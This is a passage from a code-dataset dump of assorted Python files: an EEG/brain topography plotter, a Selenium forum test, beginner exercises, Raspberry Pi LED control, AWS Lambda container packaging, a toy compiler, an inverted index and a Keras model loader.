sensor_locations):\n \"\"\"\n Initialize entities for topographic computation.\n \"\"\"\n self.topography_data = self.prepare_sensors(sensor_locations, resolution=51)\n self.head_contour = self.compute_head_contour(self.topography_data)\n self.sensor_locations = self.compute_sensors(self.topography_data)\n\n\n def draw_head_topo(self, figure, topography, color_bar_min=0, color_bar_max=0):\n \"\"\"\n Draw Head top view.\n \"\"\"\n self._fit_topology(figure, topography, self.topography_data, color_bar_min, color_bar_max)\n if self.plothead:\n # draw head contour\n figure.gca().plot(self.head_contour[\"x_arr\"], self.head_contour[\"y_arr\"],\n color=self.head_contour[\"color\"], linewidth=self.head_contour[\"linewidth\"])\n if self.plotsensors:\n # Draw Sensors\n figure.gca().plot(self.sensor_locations[\"x_arr\"], self.sensor_locations[\"y_arr\"],\n self.sensor_locations[\"marker\"])\n\n\n def _fit_topology(self, figure, topography, topography_data, color_bar_min, color_bar_max):\n \"\"\"\n Trim data, to make sure everything is inside the head contour.\n \"\"\"\n x_arr = topography_data[\"x_arr\"]\n y_arr = topography_data[\"y_arr\"]\n circle_x = topography_data[\"circle_x\"]\n circle_y = topography_data[\"circle_y\"]\n rad = topography_data[\"rad\"]\n\n topo = griddata(topography_data[\"sproj\"][:, 0], topography_data[\"sproj\"][:, 1],\n numpy.ravel(numpy.array(topography)), x_arr, y_arr)\n if self.plot_contours:\n #draw the contours\n 
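# topo has already been interpolated onto the regular grid by griddata above\n 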
figure.gca().contour(x_arr, y_arr, topo, 10, colors='k', origin=\"lower\", hold='on')\n\n # mask values outside the head\n if self.masked:\n notinhead = numpy.greater_equal((x_arr - circle_x) ** 2 + (y_arr - circle_y) ** 2, (1.0 * rad) ** 2)\n topo = numpy.ma.masked_where(notinhead, topo)\n\n # show surface\n map_surf = figure.gca().imshow(topo, origin=\"lower\", extent=(-rad, rad, -rad, rad))\n\n if not (color_bar_min == 0 and color_bar_max == 0):\n norm = colors.Normalize(vmin=color_bar_min, vmax=color_bar_max)\n map_surf.set_norm(norm)\n figure.colorbar(map_surf)\n figure.gca().set_axis_off()\n return map_surf\n\n\n @staticmethod\n def prepare_sensors(sensor_locations, resolution=51):\n \"\"\"\n Common method, to pre-process sensors before display (project them in 2D).\n \"\"\"\n\n\n def sphere_fit(params):\n \"\"\"Function to fit the sensor locations to a sphere\"\"\"\n return ((sensor_locations[:, 0] - params[1]) ** 2 + (sensor_locations[:, 1] - params[2]) ** 2\n + (sensor_locations[:, 2] - params[3]) ** 2 - params[0] ** 2)\n\n\n (radius, circle_x, circle_y, circle_z) = leastsq(sphere_fit, (1, 0, 0, 0))[0]\n # size of each square\n ssh = float(radius) / resolution # half-size\n # Generate a grid and interpolate using the gridData module\n x_arr = numpy.arange(circle_x - radius, circle_x + radius, ssh * 2.0) + ssh\n y_arr = numpy.arange(circle_y - radius, circle_y + radius, ssh * 2.0) + ssh\n x_arr, y_arr = pylab.meshgrid(x_arr, y_arr)\n\n # project the sensor locations onto the sphere\n sproj = sensor_locations - numpy.array((circle_x, circle_y, circle_z))\n sproj = radius * sproj / numpy.c_[numpy.sqrt(numpy.sum(sproj ** 2, axis=1))]\n sproj += numpy.array((circle_x, circle_y, circle_z))\n return dict(sproj=sproj, x_arr=x_arr, y_arr=y_arr,\n circle_x=circle_x, circle_y=circle_y, rad=radius)\n\n\n @staticmethod\n def compute_sensors(topography_data):\n \"\"\"\n Get locations for the sensors, based on connectivity's projection.\n \"\"\"\n sproj = topography_data[\"sproj\"]\n circle_x = topography_data[\"circle_x\"]\n circle_y = topography_data[\"circle_y\"]\n\n zenum = [x[::-1] for x in enumerate(sproj[:, 2].tolist())]\n zenum.sort()\n indx = [x[1] for x in zenum]\n return dict(x_arr=sproj[indx, 0] - circle_x / 2.0, y_arr=sproj[indx, 1] - circle_y / 2.0, marker='wo')\n\n\n @staticmethod\n def compute_head_contour(topography_data, color='k', linewidth='5'):\n \"\"\"\n Plot the main contour (contour of the head).\n \"\"\"\n scale = topography_data[\"rad\"]\n shift = (topography_data[\"circle_x\"] / 2.0, topography_data[\"circle_y\"] / 2.0)\n\n rmax = 0.5\n fac = 2 * numpy.pi * 0.01\n # Coordinates for the ears\n ear_x1 = -1 * numpy.array([.497, .510, .518, .5299, .5419, .54, .547,\n .532, .510, rmax * numpy.cos(fac * (54 + 42))])\n ear_y1 = numpy.array([.0655, .0775, .0783, .0746, .0555, -.0055,\n -.0932, -.1313, -.1384, rmax * numpy.sin(fac * (54 + 42))])\n ear_x2 = numpy.array([rmax * numpy.cos(fac * (54 + 42)), .510, .532,\n .547, .54, .5419, .5299, .518, .510, .497])\n ear_y2 = numpy.array([rmax * numpy.sin(fac * (54 + 42)), -.1384, -.1313,\n -.0932, -.0055, .0555, .0746, .0783, .0775, .0655])\n # Coordinates for the Head\n head_x1 = numpy.fromfunction(lambda x: rmax * numpy.cos(fac * (x + 2)), (21,))\n head_y1 = numpy.fromfunction(lambda y: rmax * numpy.sin(fac * (y + 2)), (21,))\n head_x2 = numpy.fromfunction(lambda x: rmax * numpy.cos(fac * (x + 28)), (21,))\n head_y2 = numpy.fromfunction(lambda y: rmax * numpy.sin(fac * (y + 28)), (21,))\n head_x3 = numpy.fromfunction(lambda x: 
rmax * numpy.cos(fac * (x + 54)), (43,))\n head_y3 = numpy.fromfunction(lambda y: rmax * numpy.sin(fac * (y + 54)), (43,))\n # Coordinates for the Nose\n nose_x = numpy.array([.18 * rmax, 0, -.18 * rmax])\n nose_y = numpy.array([rmax - 0.004, rmax * 1.15, rmax - 0.004])\n # Combine to get the contour\n x_arr = numpy.concatenate((ear_x2, head_x1, nose_x, head_x2, ear_x1, head_x3))\n y_arr = numpy.concatenate((ear_y2, head_y1, nose_y, head_y2, ear_y1, head_y3))\n x_arr *= 2 * scale\n y_arr *= 2 * scale\n x_arr += shift[0]\n y_arr += shift[1]\n\n return dict(x_arr=x_arr, y_arr=y_arr, color=color, linewidth=linewidth)\n\n\n @classmethod\n def _normalize(cls, points_positions):\n \"\"\"Centers the brain.\"\"\"\n steps = []\n for column_idx in range(3):\n column = [row[column_idx] for row in points_positions]\n step = (max(column) + min(column)) / 2.0\n steps.append(step)\n step = numpy.array(steps)\n return points_positions - step\n\n\n\nclass TopographicViewer(BaseTopography, ABCMPLH5Displayer):\n \"\"\"\n Interface between TVB Framework and web display of a topography viewer.\n \"\"\"\n\n _ui_name = \"Topographic View\"\n _ui_subsection = \"topography\"\n\n\n def get_input_tree(self):\n return [{'name': 'data_0', 'label': 'Connectivity Measures 1',\n 'type': ConnectivityMeasure, 'required': True,\n 'conditions': FilterChain(fields=[FilterChain.datatype + '._nr_dimensions'],\n operations=[\"==\"], values=[1]),\n 'description': 'Punctual values for each node in the connectivity matrix. '\n 'This will give the colors of the resulting topographic image.'},\n {'name': 'data_1', 'label': 'Connectivity Measures 2', 'type': ConnectivityMeasure,\n 'conditions': FilterChain(fields=[FilterChain.datatype + '._nr_dimensions'],\n operations=[\"==\"], values=[1]),\n 'description': 'Comparative values'},\n {'name': 'data_2', 'label': 'Connectivity Measures 3', 'type': ConnectivityMeasure,\n 'conditions': FilterChain(fields=[FilterChain.datatype + '._nr_dimensions'],\n operations=[\"==\"], values=[1]),\n 'description': 'Comparative values'},\n {'name': 'display_contours', 'label': 'Display Contours', 'type': 'bool'}]\n\n\n def plot(self, figure, data_0, data_1=None, data_2=None, display_contours=True):\n \"\"\"\n Actual drawing method.\n \"\"\"\n connectivity = data_0.connectivity\n sensor_locations = BaseTopography._normalize(connectivity.centres)\n self.plot_contours = display_contours\n sensor_number = len(sensor_locations)\n\n arrays = []\n titles = []\n for measure in [data_0, data_1, data_2]:\n if measure is not None:\n if len(measure.connectivity.centres) != sensor_number:\n raise Exception(\"Use the same connectivity!!!\")\n arrays.append(measure.array_data.tolist())\n titles.append(measure.title)\n\n self.init_topography(sensor_locations)\n\n for i, array_data in enumerate(arrays):\n figure.add_subplot(1, len(arrays), i + 1)\n self.draw_head_topo(figure, array_data)\n figure.gca().set_title(titles[i])\n\n\n\n","sub_path":"tvb/adapters/visualizers/mplh5_topographic.py","file_name":"mplh5_topographic.py","file_ext":"py","file_size_in_byte":11707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"193848752","text":"import unittest\nfrom selenium import webdriver\nfrom testsuite.base_testcase import BaseTestCase\nfrom pageobject.discuz_login import LoginPage\nfrom pageobject.discuz2_page import Login_AdminUsername2\n\nclass Admin_Login_delmessage(BaseTestCase):\n # 实战二\n def test_adminLogin_delmessage(self):\n\n login_page = LoginPage(self.driver)\n 
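# page objects for the Discuz login and admin flows; self.driver is presumably\n        # created by the BaseTestCase setup\n        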
admin_page = Login_AdminUsername2(self.driver)\n\n login_page.login_page('admin', \"admin\")\n login_page.login_first_page()\n admin_page.del_message_page()\n admin_page.admin_page()\n # admin_page.admin_page('admin')\n\n admin_page.new_block_page('自动化测试')\n login_page.end_login()\n login_page.login_page('chen','chen')\n admin_page.new_block_message()\n login_page.login_send_page('普通用户发帖标题','普通用户发帖内容%……&**——————————————')\n login_page.login_reply_page('普通用户回帖。。。。。。')\n\nif __name__=='__main__':\n unittest.main()","sub_path":"baidu01/testsuite/test_second_search.py","file_name":"test_second_search.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"450500737","text":"def withness(arr):\n count=0\n max=0\n for i in range(len(arr)-1,-1,-1):\n if arr[i]>max:\n max=arr[i]\n print(arr[i])\n count+=1\n return count\nif __name__ == \"__main__\":\n arr=[8,5,3,2,1]\n print(withness(arr))\n\n","sub_path":"find withness.py","file_name":"find withness.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"29276124","text":"# GPIO.BOARD 12 & 40 for the green lights\n# GPIO.BOARD 16 & 37 for the red lights\n# GPIO.BOARD 36 for the orange lights\n''' Created by Tan Solomon on 24th Dec 2016 from scratch :DDD\n\tThis file will run a total of 5 lights; 2 red, 2 green and 1 orange in a\n\tchristmas pattern. The layout is as follows;\n\tred - green - orange - green - red\n'''\nimport RPi.GPIO as GPIO\nimport time\n\nGPIO.setmode(GPIO.BOARD)\n\n# GPIO.setup(12,GPIO.OUT)\n# GPIO.setup(16,GPIO.OUT)\n# GPIO.setup(36,GPIO.OUT)\n# GPIO.setup(40,GPIO.OUT)\n\nyes = ['Y','y']\ngreen = [12,40]\nred = [37,16]\norange = [36]\n\nGPIO.setup(red+green+orange,GPIO.OUT)\n\nwhile True:\n\tanswer = raw_input(\"Do you wish to loop? (Y/N): \")\n\tif any(answer == i for i in yes):\n\n\t\tnoOfLoops = int(raw_input(\"How many loops would you like? 
Each loop is 1.2s: \"))\n\t\tfor i in range(noOfLoops):\n\t\t\t# Each loop takes 1.2 seconds and loops from the outermost lights to the innermost\n\t\t\tGPIO.output(red, True)\n\t\t\ttime.sleep(0.4)\n\t\t\tGPIO.output(red, False)\n\t\t\tGPIO.output(green, True)\n\t\t\ttime.sleep(0.4)\n\t\t\tGPIO.output(green, False)\n\t\t\tGPIO.output(36, True)\n\t\t\ttime.sleep(0.4)\n\t\t\tGPIO.output(36, False)\n\telse:\n\t\tbreak\n\n\n\nGPIO.cleanup()\n","sub_path":"RasPi/christmaslight.py","file_name":"christmaslight.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"628367689","text":"\"\"\"Finding duplicate letters in a word.\"\"\"\n\n__author__ = \"730389123\"\n\nword = str(input(\"Enter a word: \"))\ndup: bool = False \n\ni: int = 0\nwhile i < len(word):\n char = str(word[i])\n j: int = i + 1\n while j < len(word):\n test = str(word[j])\n if char == test:\n dup: bool = True\n j = j + 1\n i = i + 1\n\nif dup is False:\n print(\"Found duplicate: False\")\nelse:\n print(\"Found duplicate: True\")","sub_path":"exercises/ex03/find_duplicates.py","file_name":"find_duplicates.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"283276694","text":"# SCAR - Serverless Container-aware ARchitectures\n# Copyright (C) 2011 - GRyCAP - Universitat Politecnica de Valencia\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. 
If not, see .\n\nimport os\nimport shutil\nimport src.logger as logger\nimport src.utils as utils\nimport subprocess\nimport tempfile\nfrom distutils import dir_util\nimport src.exceptions as excp\nfrom src.providers.aws.validators import AWSValidator\n\nMAX_PAYLOAD_SIZE = 50 * 1024 * 1024\nMAX_S3_PAYLOAD_SIZE = 250 * 1024 * 1024\n\ndef udocker_env(func):\n '''\n Decorator used to avoid losing the definition of the udocker\n environment variables (if any) \n '''\n def wrapper(*args, **kwargs):\n FunctionPackageCreator.save_tmp_udocker_env()\n func(*args, **kwargs)\n FunctionPackageCreator.restore_udocker_env()\n return wrapper\n\nclass FunctionPackageCreator():\n \n src_path = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n aws_src_path = os.path.dirname(os.path.abspath(__file__))\n lambda_code_files_path = utils.join_paths(aws_src_path, \"cloud/lambda/\")\n os_tmp_folder = tempfile.gettempdir()\n scar_temporal_folder = utils.join_paths(os_tmp_folder, \"scar/\")\n \n supervisor_source = utils.join_paths(lambda_code_files_path, \"scarsupervisor.py\")\n \n udocker_file = \"udockerb\" if utils.is_binary_execution() else \"udockerpy\"\n udocker_source = utils.join_paths(lambda_code_files_path, udocker_file)\n udocker_dest = utils.join_paths(scar_temporal_folder, \"udockerb\")\n \n udocker_exec = [udocker_dest]\n udocker_tarball = \"\"\n udocker_dir = \"\"\n init_script_name = \"init_script.sh\"\n init_script_path = \"/var/task/{0}\".format(init_script_name)\n extra_payload_path = \"/var/task\"\n \n def __init__(self, package_props):\n self.properties = package_props\n self.lambda_code_name = \"{0}.py\".format(self.properties['FunctionName'])\n self.supervisor_dest = utils.join_paths(self.scar_temporal_folder, self.lambda_code_name)\n \n @excp.exception(logger)\n def prepare_lambda_code(self):\n self.clean_tmp_folders()\n self.add_mandatory_files()\n \n if 'DeploymentBucket' in self.properties and 'ImageId' in self.properties:\n self.download_udocker_image()\n if 'ImageFile' in self.properties:\n self.prepare_udocker_image()\n \n self.add_init_script() \n self.add_extra_payload()\n self.set_permissions()\n self.zip_scar_folder()\n self.check_code_size()\n\n def add_mandatory_files(self):\n os.makedirs(self.scar_temporal_folder, exist_ok=True)\n shutil.copy(utils.resource_path(self.supervisor_source), self.supervisor_dest)\n shutil.copy(utils.resource_path(self.udocker_source), self.udocker_dest)\n \n os.makedirs(utils.join_paths(self.scar_temporal_folder, \"src\"), exist_ok=True)\n \n initpy_source = utils.resource_path(utils.join_paths(self.lambda_code_files_path, \"__init__.py\"))\n self.initpy_dest = utils.join_paths(self.scar_temporal_folder, \"src/__init__.py\")\n shutil.copy(initpy_source, self.initpy_dest)\n \n utils_source = utils.resource_path(utils.join_paths(self.src_path, \"utils.py\"))\n self.utils_dest = utils.join_paths(self.scar_temporal_folder, \"src/utils.py\")\n shutil.copy(utils_source, self.utils_dest)\n \n exceptions_source = utils.resource_path(utils.join_paths(self.src_path, \"exceptions.py\"))\n self.exceptions_dest = utils.join_paths(self.scar_temporal_folder, \"src/exceptions.py\")\n shutil.copy(exceptions_source, self.exceptions_dest) \n \n self.set_environment_variable('UDOCKER_DIR', \"/tmp/home/udocker\")\n self.set_environment_variable('UDOCKER_LIB', \"/var/task/udocker/lib/\")\n self.set_environment_variable('UDOCKER_BIN', \"/var/task/udocker/bin/\")\n self.create_udocker_files()\n \n @udocker_env \n def 
create_udocker_files(self):\n self.execute_command(self.udocker_exec + [\"help\"], cli_msg=\"Packing udocker files\")\n \n def add_init_script(self):\n if 'Script' in self.properties:\n shutil.copy(self.properties['Script'], utils.join_paths(self.scar_temporal_folder, self.init_script_name))\n self.properties['EnvironmentVariables']['INIT_SCRIPT_PATH'] = self.init_script_path \n \n def add_extra_payload(self):\n if 'ExtraPayload' in self.properties:\n logger.info(\"Adding extra payload from {0}\".format(self.properties['ExtraPayload']))\n dir_util.copy_tree(self.properties['ExtraPayload'], self.scar_temporal_folder)\n self.set_environment_variable('EXTRA_PAYLOAD', self.extra_payload_path) \n \n def check_code_size(self):\n # Check if the code size fits within the aws limits \n if 'DeploymentBucket' in self.properties:\n AWSValidator.validate_s3_code_size(self.scar_temporal_folder, MAX_S3_PAYLOAD_SIZE)\n else:\n AWSValidator.validate_function_code_size(self.scar_temporal_folder, MAX_PAYLOAD_SIZE) \n \n def clean_tmp_folders(self):\n if os.path.isfile(self.properties['ZipFilePath']): \n utils.delete_file(self.properties['ZipFilePath'])\n # Delete created temporal files\n if os.path.isdir(self.scar_temporal_folder):\n shutil.rmtree(self.scar_temporal_folder, ignore_errors=True)\n \n def set_permissions(self):\n self.execute_command(['chmod', '0664', self.supervisor_dest])\n self.execute_command(['chmod', '0775', self.udocker_dest])\n self.execute_command(['chmod', '0664', self.initpy_dest])\n self.execute_command(['chmod', '0664', self.utils_dest])\n self.execute_command(['chmod', '0664', self.exceptions_dest])\n \n def zip_scar_folder(self):\n zip_exe = utils.resource_path(\"src/bin/zip\", bin_path='/usr/bin/zip')\n self.execute_command([zip_exe, \"-r9y\", self.properties['ZipFilePath'], \".\"],\n cmd_wd=self.scar_temporal_folder,\n cli_msg=\"Creating function package\")\n \n @classmethod\n def save_tmp_udocker_env(cls):\n #Avoid override global variables\n if utils.is_value_in_dict(os.environ, 'UDOCKER_TARBALL'):\n cls.udocker_tarball = os.environ['UDOCKER_TARBALL']\n if utils.is_value_in_dict(os.environ, 'UDOCKER_DIR'):\n cls.udocker_dir = os.environ['UDOCKER_DIR']\n # Set temporal global vars\n udocker_tarball = utils.resource_path(utils.join_paths(cls.lambda_code_files_path, \"udocker-1.1.0-RC2.tar.gz\"))\n utils.set_environment_variable('UDOCKER_TARBALL', udocker_tarball)\n utils.set_environment_variable('UDOCKER_DIR', utils.join_paths(cls.scar_temporal_folder, \"udocker\"))\n \n @classmethod \n def restore_udocker_env(cls):\n cls.restore_environ_var('UDOCKER_TARBALL', cls.udocker_tarball)\n cls.restore_environ_var('UDOCKER_DIR', cls.udocker_dir)\n \n @classmethod\n def restore_environ_var(cls, key, var):\n if var:\n utils.set_environment_variable(key, var)\n else:\n del os.environ[key] \n \n def execute_command(self, command, cmd_wd=None, cli_msg=None):\n cmd_out = subprocess.check_output(command, cwd=cmd_wd).decode(\"utf-8\")\n logger.info(cli_msg, cmd_out)\n return cmd_out[:-1]\n \n @udocker_env \n def prepare_udocker_image(self):\n image_path = utils.join_paths(self.os_tmp_folder, \"udocker_image.tar.gz\")\n shutil.copy(self.properties['ImageFile'], image_path)\n cmd_out = self.execute_command(self.udocker_exec + [\"load\", \"-i\", image_path], cli_msg=\"Loading image file\")\n self.create_udocker_container(cmd_out)\n self.set_environment_variable('IMAGE_ID', cmd_out)\n self.set_udocker_local_registry()\n \n @udocker_env \n def download_udocker_image(self):\n 
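# pull the container image with the bundled udocker binary so its layers can be\n        # packed into the Lambda deployment artifact\n        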
self.execute_command(self.udocker_exec + [\"pull\", self.properties['ImageId']], cli_msg=\"Downloading container image\")\n self.create_udocker_container(self.properties['ImageId'])\n self.set_udocker_local_registry()\n \n def create_udocker_container(self, image_id):\n if(utils.get_tree_size(self.scar_temporal_folder) < MAX_S3_PAYLOAD_SIZE/2):\n self.execute_command(self.udocker_exec + [\"create\", \"--name=lambda_cont\", image_id], cli_msg=\"Creating container structure\")\n if(utils.get_tree_size(self.scar_temporal_folder) > MAX_S3_PAYLOAD_SIZE):\n shutil.rmtree(utils.join_paths(self.scar_temporal_folder, \"udocker/containers/\")) \n \n def set_udocker_local_registry(self):\n self.set_environment_variable('UDOCKER_REPOS', '/var/task/udocker/repos/')\n self.set_environment_variable('UDOCKER_LAYERS', '/var/task/udocker/layers/') \n\n def set_environment_variable(self, key, val):\n if key and val:\n self.properties['EnvironmentVariables'][key] = val\n ","sub_path":"src/providers/aws/functioncode.py","file_name":"functioncode.py","file_ext":"py","file_size_in_byte":9672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"149866147","text":"class Solution:\n def buildTree(self, preorder: List[int], inorder: List[int]) -> TreeNode:\n def myBuildTree(preorder_left,preorder_right,inorder_left,inorder_right):\n if preorder_left > preorder_right:\n return None\n \n preorder_root = preorder_left\n inorder_root = index[preorder[preorder_root]]\n\n root = TreeNode(preorder[preorder_root])\n size_left_subtree = inorder_root - inorder_left\n\n root.left = myBuildTree(preorder_left+1,preorder_left+size_left_subtree,inorder_left,inorder_root-1)\n root.right = myBuildTree(preorder_left+size_left_subtree+1,preorder_right,inorder_root+1,inorder_right)\n return root\n\n n = len(preorder)\n\n index ={element:i for i, element in enumerate(inorder)}\n return myBuildTree(0,n-1,0,n-1)\n","sub_path":"Week_03/buildTree.py","file_name":"buildTree.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"11961464","text":"#逐行读取\n\"\"\"\nwith open('../chapter9/pi_digits.txt') as file_object:\n contents = file_object.read()\nprint(contents.rstrip())\n\"\"\"\n#创建一个包含文件各行内容的列表\n\"\"\"\nwith open('../chapter9/pi_digits.txt') as file_object:\n lines = file_object.readlines()\nfor line in lines:\n print(line.rstrip())\n\"\"\"\n#使用文件的内容\nfileName = 'pi_million_digits.txt';\nwith open(fileName) as file_object:\n lines = file_object.readlines();\npi_string = '';\nfor line in lines:\n pi_string += line.rstrip().lstrip();\nprint(pi_string)\nprint(len(pi_string))\nbirthday = input(\"Enter your birthday, in the form mmddyy: \")\nif birthday in pi_string:\n print('Your birthday appears in the first million digits of pi!')\nelse:\n print(\"Your birthday does not appear in the first million digits of pi.\")\npi_string = pi_string.replace('19716939','888888888')\nprint(pi_string)\n","sub_path":"chapter10/file_reader.py","file_name":"file_reader.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"317111330","text":"# -*- coding: utf-8 -*-\n\nclass Func(object):\n\n def __init__(self, name, args=()):\n self.name = name\n self.body = []\n self.args = dict(zip(args, [i for i in range(len(args))]))\n self.local = dict()\n\n def find_var(self, name):\n if name in self.args:\n return 'arg', 
self.args.get(name)\n return 'local', self.local.get(name)\n\n def add_var(self, name):\n idx = len(self.local)\n self.local[name] = idx\n return idx\n\n def write(self, statement):\n self.body.append(statement)\n\n def generate(self):\n header = ' '.join(('func', self.name, str(len(self.args)),))\n body = '\\n'.join(self.body)\n return '\\n'.join((header, body, 'return',))\n\n\nglobal_func = [\n \"\"\"\n func mult 2\n push const 0\n pop local 0\n push arg 1\n pop local 1\n label multloop\n push const 0\n push local 1\n eq\n ifgoto multend\n push local 0\n push arg 0\n add\n pop local 0\n push local 1\n push const 1\n sub\n pop local 1\n goto multloop\n label multend\n push local 0\n return\n \"\"\",\n]\n\n\nclass CodeGenerator(object):\n\n def __init__(self):\n self.init()\n\n def init(self):\n self.label_idx = 0\n self.funcs = dict(main=Func('main'))\n\n def compile(self, ir, func=None):\n if func is None: func = self.funcs.get('main')\n if isinstance(ir, int):\n s = 'push const ' + str(ir)\n func.write(s)\n elif isinstance(ir, str):\n space, idx = func.find_var(ir)\n s = 'push ' + space + ' ' + str(idx)\n func.write(s)\n elif not isinstance(ir, list):\n pass\n elif ir[0] == 'begin':\n for x in ir[1:]: self.compile(x, func)\n elif ir[0] == '+':\n for x in ir[1:]: self.compile(x, func)\n for _ in range(len(ir)-2): func.write('add')\n elif ir[0] == '-':\n self.compile(ir[1], func)\n for x in ir[2:]:\n self.compile(x, func)\n func.write('sub')\n elif ir[0] == '*':\n for x in ir[1:]: self.compile(x, func)\n for _ in range(len(ir)-2): func.write('call mult')\n elif ir[0] == '=':\n for x in ir[1:]: self.compile(x, func)\n for _ in range(len(ir)-2): func.write('eq')\n elif ir[0] == '>':\n self.compile(ir[1], func)\n for x in ir[2:]:\n self.compile(x, func)\n func.write('gt')\n elif ir[0] == '<':\n self.compile(ir[1], func)\n for x in ir[2:]:\n self.compile(x, func)\n func.write('lt')\n elif ir[0] == 'define':\n return self._define(ir, func)\n elif ir[0] == 'set!':\n self.compile(ir[2], func)\n space, idx = func.find_var(ir[1])\n s = 'pop ' + space + ' ' + str(idx)\n func.write(s)\n elif ir[0] == 'if':\n self.compile(ir[1], func)\n func.write('ifgoto '+str(self.label_idx))\n self.compile(ir[3], func)\n func.write('goto '+str(self.label_idx+1))\n func.write('label '+str(self.label_idx))\n self.compile(ir[2], func)\n func.write('label '+str(self.label_idx+1))\n else:\n for x in ir[1:]: self.compile(x, func)\n func.write('call '+ir[0]) \n\n def _define(self, ir, func):\n if isinstance(ir[1], str):\n self.compile(ir[2], func)\n idx = func.add_var(ir[1])\n func.write('pop local '+str(idx))\n if isinstance(ir[1], list):\n name, *args = ir[1]\n def_func = Func(name, args)\n self.funcs[name] = def_func\n self.compile(ir[2], def_func)\n\n def generate(self):\n func_text = '\\n'.join([func.generate() for _, func in self.funcs.items()])\n global_text = '\\n'.join(global_func)\n return global_text + '\\n' + func_text\n\n def __call__(self, ir):\n self.init()\n self.compile(ir)\n return self.generate()\n","sub_path":"app/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":4158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"275131738","text":"#-*- coding: UTF-8 -*-\n'''\nCreated on 2013-11-9\n\n@author: xubo\n\n为红楼梦建立一个倒排索引\n'''\n\ninputpath = \"redwords.txt\"\n#inputpath = \"redtest.txt\"\noutputpath = \"redindex.txt\"\n \n\nword_dict = dict()\n\ninputfile = open(inputpath,'r')\nlines = inputfile.readlines()\nfor line in 
lines:\n line = line.rstrip()\n words = line.split(\"\\t\")\n word_count = words[0]\n word = words[1]\n for i in range(len(word)/3):\n term = word[3*i:3*i+3]\n if term not in word_dict:\n word_dict[term] = set()\n word_dict[term].add(word_count)\n \n\n\noutputfile = open(outputpath,'w')\nfor k,v in word_dict.iteritems():\n outputfile.write(\"%s\\t%s\\n\" %(k,\" \".join(v)))","sub_path":"reverseindex.py","file_name":"reverseindex.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"10075442","text":"from keras.models import load_model, save_model\n\nfrom Chromosome import Chromosome\n\nimport pickle\n\nimport os\nimport os.path\n\n#TODO: add save functionality\n\n'''\n Data access object to saving and loading DNN classes. Loads keras models and Chromosome (s).\n'''\nclass DNN_dao:\n\n def __init__ (self):\n self.CHROMOSOME_FILENAME = 'chromosome'\n self.MODEL_FILENAME = 'model.hdf5'\n\n self.model = None\n self.chromosome = None\n\n '''\n Loads a saved DNN object and its Chromosome. Sets self.model and self.chromosome.\n\n Args: _directoryPath = string, folder path to load from\n '''\n def load (self, _directoryPath):\n print('loading model from', _directoryPath)\n\n # save current working directory\n oldPath = os.getcwd()\n\n # go into save folder\n if os.path.exists(_directoryPath):\n os.chdir(_directoryPath)\n else:\n raise Exception ('DNN save directory path does not exist:', _directoryPath)\n\n print('\\n', os.path.exists(self.CHROMOSOME_FILENAME), '\\n')\n # load chromosome if it exists\n if os.path.exists(self.CHROMOSOME_FILENAME):\n print('\\nloading chromosome\\n')\n self.chromosome = Chromosome.load(self.CHROMOSOME_FILENAME)\n\n # load model if it exists\n if os.path.exists(self.MODEL_FILENAME):\n print('\\nloading model\\n')\n self.model = load_model(self.MODEL_FILENAME)\n else:\n raise Exception ('DNN model save file not present:', self.MODEL_FILENAME)\n\n # restore current working directory\n os.chdir(oldPath)\n\n '''\n Saves a DNN object and its Chromosome if present.\n\n Args: _directoryPath = folder path to save DNN to\n _dnn = DNN object to save\n '''\n def save (self, _directoryPath, _dnn):\n print('saving DNN to', _directoryPath, '/', self.MODEL_FILENAME)\n\n # save current working directory\n oldPath = os.getcwd()\n\n # check if path exists. 
if not, create it and go in\n        if not os.path.exists(_directoryPath):\n            os.makedirs(_directoryPath, exist_ok=True)\n        os.chdir(_directoryPath)\n\n        # save Chromosome if it exists\n        if _dnn.get_chromosome() != None:\n            print('\\nsaving chromosome\\n')\n\n            try:\n                _dnn.get_chromosome().save(self.CHROMOSOME_FILENAME)\n            except Exception as e:\n                raise e\n\n        # save DNN model\n        try:\n            _dnn.get_model().save(self.MODEL_FILENAME)\n        except Exception as e:\n            raise e\n\n        # restore current working directory\n        os.chdir(oldPath)\n\n    '''\n        Returns the loaded Keras model.\n\n        Returns:Model = Keras sequential model\n    '''\n    def get_model (self):\n        if self.model == None:\n            raise Exception ('No model to return')\n        return self.model\n\n    '''\n        Returns the loaded Chromosome object, if it exists.\n\n        Returns:Chromosome = Chromosome object\n    '''\n    def get_chromosome (self):\n        if self.chromosome == None:\n            raise Exception ('No chromosome to return')\n        return self.chromosome\n\n","sub_path":"folder-to-turn-in/DNN_dao.py","file_name":"DNN_dao.py","file_ext":"py","file_size_in_byte":3192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
